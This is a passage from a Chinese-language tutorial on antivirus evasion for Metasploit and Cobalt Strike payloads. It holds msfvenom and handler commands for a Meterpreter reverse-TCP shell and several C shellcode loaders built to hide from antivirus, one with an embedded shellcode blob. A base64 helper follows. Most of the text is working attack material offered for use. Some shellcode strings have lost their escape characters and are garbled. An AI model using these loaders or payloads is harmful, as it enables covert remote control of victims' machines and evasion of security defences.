基础生成命令
选择A#(即自动模式)选择注入的程序选择是否要用隐身模式(建议不使用,免杀效果会变差)选择自定义字符还是自动字符选择模块#一般是选择1模块设置ip,设置端口监听方法
handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp(监听方法)
4、利用avet实现免杀【带你了解 免杀的小知识】运行
#进入其的目录#然后 Python 其py程序即可一般是直接选择2生成一个payload
四、利用源码编译+加载器加载代码实现免杀方式一
cs+c语言代码组合拳
可参考:
https://blog.csdn.net/qq_33942040/article/details/106463360
方式二,msf+c语言源代码
思路和cs实现免杀的思路差不多,利用编译进行绕过实现的
①首先现在msf中生成shellcode
c语言代码1
msfvenom -pwindows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b 'x00' lhost=10.211.55.2 lport=3333-f c -o shell.c②在c语言代码的buf[]=中添加该shell然后进行编译即可
unsigned char buf[] = "shellcode";#pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"") //windows控制台程序不出黑窗口main(){( (void(*)(void))&buf)();}c语言代码2
免杀生成出现问题
#include <Windows.h>#include <stdio.h>#include <string.h>#pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"") //windows控制台程序不出黑窗口unsigned char buf[] = "shellcode";main(){char *Memory;Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);memcpy(Memory, buf, sizeof(buf));((void(*)())Memory)();}
#include<windows.h>#include<stdio.h>unsigned char buf[] ="xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30""x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff""xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52""x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1""x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b""x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03""x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b""x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24""x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb""x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c""x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54""x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8x2bx99""x68x02x00x11x5cx89xe6x50x50x50x50x40x50x40x50""x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5""x74x61xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67""x00x00x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxff""xd5x83xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00""x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56""x53x57x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58""x68x00x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5""x57x68x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85""x70xffxffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1""xc3xbbxf0xb5xa2x56x6ax00x53xffxd5";size_t size = sizeof(buf);int main(){char *inject;inject = (char*)VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);//分配可读可写可执行memcpy(inject, buf, size);//复制大小进去((void(*)())inject)();//执行}c语言代码3
#include <windows.h>#include <stdio.h>#pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] ="";void main(){__asm{mov eax, offset shellcodejmp eax}}c语言代码4
#include <windows.h>#include <stdio.h>unsigned char buf[] ="";void main(){((void(WINAPI*)(void))&buf)();}c语言代码5(汇编花指令)
注意:生成的exe文件需要环境中有几个.dll文件才可运行
#include <windows.h>#include <stdio.h>#pragma comment(linker, "/section:.data,RWE")unsigned char shellcode[] ="";void main(){__asm{mov eax, offset shellcode_emit 0xFF_emit 0xE0}}c语言代码6
base64.c 代码
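/* Base64 encoder/decoder. Originally Apache file ap_base64.c */
#include <string.h>
#include "base64.h"

/*
 * Reverse lookup table: byte value -> 6-bit group value.
 * Every byte outside the base64 alphabet (including '=' and '\0') maps
 * to 64, which the decoders below treat as "end of encoded data".
 * (aaaack but it's fast and const should make it shared text page.)
 */
static const unsigned char pr2six[256] = {
    /* ASCII table */
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63,
    52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64,
    64,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14,
    15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64,
    64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
    41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64,
    64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64
};

/*
 * Number of leading bytes of @bufcoded that belong to the base64 alphabet.
 * The scan stops at the first byte mapping to 64 in pr2six, so a '=' pad
 * or the string terminator ends it; @bufcoded must be NUL-terminated.
 */
static int b64_valid_prefix_len(const char *bufcoded)
{
    const unsigned char *bufin = (const unsigned char *)bufcoded;
    while (pr2six[*bufin] <= 63) {
        bufin++;
    }
    return (int)(bufin - (const unsigned char *)bufcoded);
}

/**
 * Size of the buffer needed by Base64decode() for @bufcoded.
 *
 * @param bufcoded  NUL-terminated base64 text (padding optional).
 * @return          upper bound on decoded bytes, plus one for the NUL.
 */
int Base64decode_len(const char *bufcoded)
{
    int nprbytes = b64_valid_prefix_len(bufcoded);
    int nbytesdecoded = ((nprbytes + 3) / 4) * 3;
    return nbytesdecoded + 1;
}

/**
 * Decode base64 text into @bufplain.
 *
 * Decoding stops at the first byte that is not in the base64 alphabet,
 * so both padded ("TQ==") and unpadded ("TQ") input are accepted.  The
 * output is NUL-terminated; @bufplain must have room for
 * Base64decode_len(bufcoded) bytes.
 *
 * @param bufplain  destination buffer.
 * @param bufcoded  NUL-terminated base64 text.
 * @return          number of decoded bytes, not counting the NUL.
 */
int Base64decode(char *bufplain, const char *bufcoded)
{
    int nprbytes = b64_valid_prefix_len(bufcoded);
    int nbytesdecoded = ((nprbytes + 3) / 4) * 3;

    unsigned char *bufout = (unsigned char *)bufplain;
    const unsigned char *bufin = (const unsigned char *)bufcoded;

    /* Full 4-char groups, except the last one which may be partial. */
    while (nprbytes > 4) {
        *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
        *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
        *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
        bufin += 4;
        nprbytes -= 4;
    }

    /* Note: (nprbytes == 1) would be an error, so just ignore that case */
    if (nprbytes > 1) {
        *(bufout++) = (unsigned char)(pr2six[*bufin] << 2 | pr2six[bufin[1]] >> 4);
    }
    if (nprbytes > 2) {
        *(bufout++) = (unsigned char)(pr2six[bufin[1]] << 4 | pr2six[bufin[2]] >> 2);
    }
    if (nprbytes > 3) {
        *(bufout++) = (unsigned char)(pr2six[bufin[2]] << 6 | pr2six[bufin[3]]);
    }

    /* The page's copy had lost the backslash here ('' is not valid C). */
    *(bufout++) = '\0';

    /* A short final group of k chars yields k-1 bytes, not 3. */
    nbytesdecoded -= (4 - nprbytes) & 3;
    return nbytesdecoded;
}

static const char basis_64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/**
 * Size of the buffer needed by Base64encode() for @len input bytes,
 * including the terminating NUL (sized as if '=' padding were emitted).
 */
int Base64encode_len(int len)
{
    return ((len + 2) / 3 * 4) + 1;
}

/**
 * Encode @len bytes of @string as base64 into @encoded.
 *
 * This variant deliberately emits NO '=' padding (the Apache original
 * does); the decoder above accepts either form.  Bytes are handled as
 * unsigned so the result does not depend on the signedness of char.
 *
 * @param encoded  destination, at least Base64encode_len(len) bytes.
 * @param string   input bytes (need not be NUL-terminated).
 * @param len      number of input bytes; 0 yields an empty string.
 * @return         bytes written to @encoded, INCLUDING the NUL.
 */
int Base64encode(char *encoded, const char *string, int len)
{
    const unsigned char *s = (const unsigned char *)string;
    char *p = encoded;
    int i;

    for (i = 0; i < len - 2; i += 3) {
        *p++ = basis_64[(s[i] >> 2) & 0x3F];
        *p++ = basis_64[((s[i] & 0x3) << 4) | ((s[i + 1] & 0xF0) >> 4)];
        *p++ = basis_64[((s[i + 1] & 0xF) << 2) | ((s[i + 2] & 0xC0) >> 6)];
        *p++ = basis_64[s[i + 2] & 0x3F];
    }

    if (i < len) {
        /* One or two trailing bytes: 2 or 3 output chars, no padding. */
        *p++ = basis_64[(s[i] >> 2) & 0x3F];
        if (i == (len - 1)) {
            *p++ = basis_64[(s[i] & 0x3) << 4];
        } else {
            *p++ = basis_64[((s[i] & 0x3) << 4) | ((s[i + 1] & 0xF0) >> 4)];
            *p++ = basis_64[(s[i + 1] & 0xF) << 2];
        }
    }

    *p++ = '\0';
    return (int)(p - encoded);
}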
